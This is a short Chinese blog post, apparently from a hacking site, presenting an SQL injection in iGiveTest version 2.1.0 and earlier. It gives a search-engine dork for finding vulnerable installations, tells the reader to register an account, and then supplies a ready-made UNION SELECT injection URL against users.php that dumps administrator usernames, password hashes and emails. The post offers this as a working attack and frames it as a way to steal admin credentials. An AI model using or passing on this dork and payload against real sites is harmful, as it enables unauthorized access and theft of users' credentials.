当前位置: iick's blog > 网站漏洞 > iGiveTest 2.1.0注入漏洞

iGiveTest 2.1.0注入漏洞

作者:hack1990 时间:11-06-22 阅读数:640人阅读

# Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌关键字: "Powered by iGiveTest"
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
 

# Nmap Security Scanner 7.0

上一篇:sb.shegong.in

下一篇:凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

相关文章

发表评论